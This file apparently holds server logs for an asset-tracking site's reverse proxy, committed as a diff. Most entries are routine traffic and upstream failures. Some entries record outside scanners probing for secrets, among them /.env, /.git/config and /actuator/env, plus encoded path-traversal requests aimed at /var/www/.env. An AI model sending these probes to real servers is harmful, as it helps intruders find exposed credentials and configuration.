[15/Feb/2026:00:34:33 +0000] - - 400 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 654] [Gzip -] [Sent-to ] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 YaBrowser/21.5.1.355 Yowser/2.5 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 474] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:55:41 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:55:47 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 2.58.56.62] [Length 0] [Gzip -] [Sent-to ] "-" "-"
|
||||||
75
npm/data/logs/proxy-host-2_error.log
Normal file
75
npm/data/logs/proxy-host-2_error.log
Normal file
@@ -0,0 +1,75 @@
|
|||||||
|
2026/02/14 22:59:23 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:59:23 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:59:49 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:59:49 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:00:28 [error] 341#341: *181 connect() failed (111: Connection refused) while connecting to upstream, client: 195.123.244.84, server: asset.hanmocnn.co.kr, request: "HEAD / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr", referrer: "http://asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:30 [warn] 340#340: *185 using uninitialized "server" variable while logging request, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "LEAKIX"
|
||||||
|
2026/02/14 23:00:30 [error] 343#343: *187 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:31 [error] 342#342: *191 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "https://222.117.41.51:8000/server", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:32 [error] 346#346: *196 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:32 [error] 346#346: *196 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:00:32 [error] 344#344: *195 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "https://222.117.41.51:8000/server-status", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:34 [error] 345#345: *204 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "https://222.117.41.51:8000/about", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:35 [error] 347#347: *207 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "https://222.117.41.51:8000/login.action", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:36 [error] 341#341: *211 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "https://222.117.41.51:8000/v2/_catalog", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:36 [error] 341#341: *214 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "https://222.117.41.51:8000/.DS_Store", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:37 [error] 341#341: *217 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "https://222.117.41.51:8000/.env", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:39 [error] 341#341: *221 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "https://222.117.41.51:8000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:41 [error] 341#341: *224 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "https://222.117.41.51:8000/.git/config", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:42 [error] 341#341: *226 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "https://222.117.41.51:8000/graphql", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:43 [error] 341#341: *229 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "https://222.117.41.51:8000/api", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:43 [error] 341#341: *231 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "https://222.117.41.51:8000/api/graphql", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:43 [error] 341#341: *233 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "https://222.117.41.51:8000/graphql/api", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:43 [error] 341#341: *235 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "https://222.117.41.51:8000/api/gql", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:44 [error] 341#341: *238 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "https://222.117.41.51:8000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:45 [error] 341#341: *244 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "https://222.117.41.51:8000/config.json", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:47 [error] 341#341: *248 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "https://222.117.41.51:8000/telescope/requests", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:47 [error] 341#341: *251 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "https://222.117.41.51:8000/info.php", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:48 [error] 341#341: *255 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "https://222.117.41.51:8000/.well-known/security.txt", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:48 [error] 341#341: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 34.72.176.129, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:49 [error] 340#340: *261 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "https://222.117.41.51:8000/actuator/env", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:51 [error] 353#353: *272 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger-ui.html", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:52 [error] 355#355: *276 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/index.html", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:53 [error] 356#356: *280 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/swagger-ui.html", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:54 [error] 354#354: *275 connect() failed (111: Connection refused) while connecting to upstream, client: 205.169.39.45, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:54 [error] 357#357: *286 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "https://222.117.41.51:8000/webjars/swagger-ui/index.html", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:55 [error] 358#358: *290 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger.json", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:56 [error] 359#359: *294 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/v1/swagger.json", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:57 [error] 360#360: *298 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "https://222.117.41.51:8000/v2/api-docs", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:58 [error] 353#353: *302 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "https://222.117.41.51:8000/v3/api-docs", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:00:59 [error] 353#353: *305 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/api-docs/swagger.json", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:00 [error] 353#353: *308 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/api/swagger.json", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:01 [error] 353#353: *311 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "https://222.117.41.51:8000/@vite/env", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:02 [error] 353#353: *314 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "https://222.117.41.51:8000/.vscode/sftp.json", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:03 [error] 353#353: *317 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:04 [error] 353#353: *320 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "https://222.117.41.51:8000/?rest_route=/wp/v2/users/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:05 [error] 353#353: *323 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "https://222.117.41.51:8000/debug/default/view?panel=config", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:10 [error] 353#353: *327 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:01:10 [error] 353#353: *327 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:02:51 [error] 380#380: *352 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:02:51 [error] 380#380: *352 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:11:33 [error] 382#382: *383 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:11:33 [error] 382#382: *383 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:12:33 [error] 392#392: *407 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:12:33 [error] 392#392: *407 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:16:33 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:16:33 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:16:40 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:8000/", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:16:40 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:18:14 [error] 418#418: *470 asset-pilot could not be resolved (3: Host not found), client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:18:14 [error] 418#418: *470 asset-pilot could not be resolved (3: Host not found), client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 00:18:31 [warn] 379#379: *259 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:18:32 [warn] 381#381: *340 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
